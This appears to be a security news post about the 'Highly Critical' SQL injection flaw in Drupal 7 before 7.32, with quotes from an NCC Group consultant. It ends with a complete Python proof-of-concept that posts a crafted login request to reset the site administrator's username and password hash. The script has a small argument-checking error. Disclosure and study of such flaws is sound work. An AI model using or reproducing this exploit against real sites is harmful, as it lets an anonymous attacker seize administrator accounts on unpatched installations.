New Drupal SQL Injection has been discovered and reported to the Drupal security team who have stated that versions of Drupal 7 prior to 7.32 are vulnerable to a “Highly Critical” SQL injection bug. Version 7.32 is now available to address the bug and the Drupal team strongly recommends that Drupal 7 admins update their sites immediately. Drupal is a popular content management system that is free and open source.
An attacker could exploit this vulnerability to achieve privilege escalation or execute arbitrary PHP code. Other unspecified attacks are said to be possible. At the time the vulnerability was disclosed no know exploits were being used. The attack can be launched by an anonymous user, meaning that no social engineering or other work is necessary to allow for it.
Robert Horton, European managing director of security consulting at NCC Group, said that the Drupal flaw is of particular concern because it’s
“extremely trivial to exploit by low skilled attackers”.
“We expect exploitation to be rapid and systemic with proof-of-concept exploits already available by individuals looking to either obtain sensitive data, or to inject malicious code into otherwise legitimate sites in order to attack users,”
Horton warned.
Despite its severity the Drupal bug was overlooked for months, Horton added.
“The fact that this vulnerability was independently sitting in the public domain in Drupal’s public bug tracking database since November 2013 is interesting”
Horton said.
“They appear to have overlooked the severity and it took an independent researcher to separately find it and bang the security drum in order for people to take notice.”
Here is a POC of the vulnerability below:
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
print "host username password"
print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d'"
+user
+"'+,+pass+%3d+'"
+hash[:55]
+"'+where+uid+%3d+'1';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
print "Success!nLogin now with user:%s and pass:%s" % (user, password)